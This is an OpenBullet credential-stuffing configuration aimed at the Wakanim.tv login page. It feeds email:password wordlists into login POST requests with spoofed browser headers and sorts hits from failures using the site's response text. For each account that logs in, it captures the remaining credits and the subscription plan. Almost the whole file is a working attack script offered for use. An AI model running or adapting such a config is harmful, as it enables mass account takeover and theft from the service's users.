[SETTINGS]
{
  "CreatorLK": "OB-ea0de401f6483bd78a57d3072bfb1a23-LoliKEY",
  "Name": "Wakanim.tv",
  "SuggestedBots": 1,
  "LastModified": "2019-04-21T14:26:00.8748474+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Acemy#7578",
  "Version": "1.2.2.5",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.wakanim.tv/de/v2/account/login?ReturnUrl=%2Fde%2Fv2" 
  CONTENT "Username=<USER>&Password=<PASS>&login=&RememberMe=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.wakanim.tv" 
  HEADER "referer: https://www.wakanim.tv/de/v2" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "authority: www.wakanim.tv" 
  HEADER "method: POST" 
  HEADER "path: /de/v2/account/login?ReturnUrl=%2Fde%2Fv2" 
  HEADER "scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "bitte versuche es noch einmal" 
  KEYCHAIN Success OR 
    KEY "Logout" 

PARSE "<SOURCE>" LR "credits_number\">" "</span>" -> CAP "CREDITS" 

PARSE "<SOURCE>" LR "div class=\"nav-user_info_account\">" "</span>" -> VAR "PLAN1" 

FUNCTION Replace "<span>" " " "<PLAN1>" -> CAP "PLAN" 

